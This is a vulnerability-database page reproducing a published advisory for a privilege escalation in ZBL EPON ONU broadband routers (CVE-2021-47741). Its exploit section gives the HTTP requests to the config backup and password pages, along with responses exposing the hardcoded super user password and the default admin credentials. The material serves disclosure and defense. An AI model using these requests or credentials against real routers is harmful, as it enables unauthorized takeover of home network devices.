Vulners
Lucene search
ZBL EPON ONU Broadband Router 1.0 Remote Privilege Escalation Exploit
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2021-47741 | 31 Dec 202521:46 | – | circl |
 | ZBL EPON ONU Broadband Router V100R001 安全漏洞 | 31 Dec 202500:00 | – | cnnvd |
 | CVE-2021-47741 | 31 Dec 202518:39 | – | cve |
 | CVE-2021-47741 ZBL EPON ONU Broadband Router V100R001 Privilege Escalation via Configuration Endpoint | 31 Dec 202518:39 | – | cvelist |
 | EUVD-2025-206085 | 31 Dec 202521:30 | – | euvd |
 | CVE-2021-47741 | 31 Dec 202519:15 | – | nvd |
 | PT-2025-54422 | 31 Dec 202500:00 | – | ptsecurity |
 | CVE-2021-47741 ZBL EPON ONU Broadband Router V100R001 Privilege Escalation via Configuration Endpoint | 31 Dec 202518:39 | – | vulnrichment |
<html><body><p>ZBL EPON ONU Broadband Router 1.0 Remote Privilege Escalation Exploit
Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND))
Product web page: http://www.zblchina.com | http://www.wd-thailand.com
Affected version: Firmwre: V100R001
Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE
EONU Hardware Version V3.0
Software: V2.46.02P6T5S
Main Chip: RTL9607
Master Controller, Copyright (c) R&D
Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband
router.
Desc: The application suffers from a privilege escalation
vulnerability. The limited administrative user (admin:admin)
can elevate his/her privileges by sending a HTTP GET request
to the configuration backup endpoint or the password page
and disclose the http super user password. Once authenticated
as super, an attacker will be granted access to additional and
privileged functionalities.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5467
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php
31.01.2021
--
Get config file and disclose super pwd:
---------------------------------------
POST /HG104B-ZG-E.config HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://192.168.1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.1.1/system_configure.asp
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=
...
#web_1
user_web_name=super
user_web_password=www168nettv
...
Disclose super pwd from system pwd page:
----------------------------------------
GET /system_password.asp
Host: 192.168.1.1
...
var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2');
var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin');
...
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Apr 2021 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.5
CVSS 48.7
EPSS0.0004
SSVC